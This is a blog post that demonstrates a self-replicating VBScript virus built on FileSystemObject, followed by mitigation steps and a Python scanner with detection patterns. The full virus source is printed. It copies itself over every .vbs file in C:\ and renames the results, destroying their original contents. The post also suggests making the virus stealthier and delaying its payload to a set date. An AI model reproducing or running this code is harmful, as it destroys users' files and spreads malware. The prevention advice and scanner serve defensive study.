VBScript Malware Demo using FileSystemObject


In recent years, malware and viruses written in scripting languages have been spreading rapidly worldwide. Every day, there is a ‘new’, ‘mutated’ malware/virus causing damage via the internet. A VBS virus is written in VBScript, which is a very powerful scripting language, especially because its features can be extended through third-party libraries (by invoking COM objects). VBScript uses existing Windows objects to write to files, the registry, etc. Therefore, it can be used to create a virus demo.

A computer virus hides itself so that it goes unnoticed. It also copies itself (also known as spreading). Under certain conditions, the virus will mutate slightly in order to generate a ‘new’ virus that is not easily detected. Finally, at some point (or randomly), the virus will do the damage (deleting files, etc.).

Therefore, the following demo script cannot exactly be called ‘a computer virus’. Rather, it is malware that looks for files and overwrites the contents of the targeted files. The targeted files will then be infected and will be able to keep spreading afterwards.

The following script uses FileSystemObject to open itself and read all of its content into a string variable vbscopy. It then looks for all targeted files in a directory, substitutes the contents of the files with vbscopy, and renames the file extension to vbs.

' Create a File System Object
Set fso = CreateObject("Scripting.FileSystemObject")

' Read itself (the virus itself)
Set self = fso.OpenTextFile(WScript.ScriptFullName, 1)

' Put the content into the string variable
vbscopy = Self.ReadAll

' Set the targeting directory
Set folder = fso.GetFolder("C:\")

' Open files and prepare to write
Set files = folder.Files
For Each file in Files
    ext = fso.GetExtensionName(file)
    ext = lcase(ext)
    ' Check file types
    If ext = "vbs" Then
        Set f = fso.GetFile(file)
        ' Spreading
        Set ap = fso.OpenTextFile(f.Path, 2, 1)
        ap.Write vbscopy
        ap.close
        f.Copy(f.path & ".vbs")
        f.Delete(1)
     End If
Next

Double-click the script, and we will find that all the vbs files are infected. All these files will then contain the malware code (an exact copy). Thus, double-clicking any of them will result in spreading again.

The above shows the most basic (or simplified) version of a virus. Further improvements would be to look more cleverly for the targeted files (not just in a particular folder). Also, the virus would not delete the original contents of ‘healthy’ files but just place a malicious virus header and hide itself until some condition is met (at certain dates). This helps the virus spread without being detected so quickly.

To prevent/disable such a virus, we can use the following measures.

1. Disable the File System Object by executing regsvr32 scrrun.dll /u. The regsvr32.exe is located at Windows\System.

2. Uninstall WSH (Windows Scripting Host), which is installed by default after Win 98.

3. Remove the file extension mappings for VBS, VBE, JS, JSE, so that double-clicking any of these files will not automatically execute the scripts.

4. Rename/delete the files wscript.exe and cscript.exe. These two are used to execute the scripting languages.

5. Disable scripting in browsers. For example, you can disable ActiveX components and plugins at the “safety level” under the tab “Internet Options” in IE.
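
On the detection side, as an added example that is not part of the original post: because every infected file is an exact copy of the script, a scanner can flag .vbs files that combine the three FileSystemObject calls the demo relies on and group byte-identical files. The function names, pattern names and sample strings below are assumptions constructed for this illustration.

```python
import hashlib
import re
from pathlib import Path

# The three steps of the demo's copy routine, as regex heuristics (assumed names).
INDICATORS = {
    "creates_fso": re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"', re.I),
    "reads_own_source": re.compile(r"OpenTextFile\s*\(\s*WScript\.ScriptFullName", re.I),
    # Mode 2 = ForWriting, 8 = ForAppending; only numeric literals are matched.
    "opens_file_for_write": re.compile(r"OpenTextFile\s*\([^,()]+,\s*[28]\b", re.I),
}

# Constructed samples: fragments for exercising the patterns, not complete scripts.
SAMPLE_SUSPECT = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    "Set self = fso.OpenTextFile(WScript.ScriptFullName, 1)\n"
    "Set ap = fso.OpenTextFile(f.Path, 2, 1)\n"
)
SAMPLE_BENIGN = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'WScript.Echo fso.FileExists("C:\\boot.ini")\n'
)

def decode(data):
    """Decode script bytes; Windows editors may save scripts as UTF-16 with a BOM."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("latin-1")

def indicators(text):
    """Return the sorted names of the indicators found in a script's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def looks_self_copying(text):
    """True only when all three steps appear in the same file."""
    return len(indicators(text)) == len(INDICATORS)

def scan(root):
    """Return (suspect paths, groups of byte-identical .vbs files) under root."""
    suspects, by_hash = [], {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() == ".vbs":
            data = path.read_bytes()
            by_hash.setdefault(hashlib.sha256(data).hexdigest(), []).append(str(path))
            if looks_self_copying(decode(data)):
                suspects.append(str(path))
    return suspects, [group for group in by_hash.values() if len(group) > 1]
```

A hit is a lead for review rather than proof, since legitimate installers also read and write files, and a script that uses named constants instead of numeric modes will not match the write pattern.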

–EOF (The Ultimate Computing & Technology Blog) —
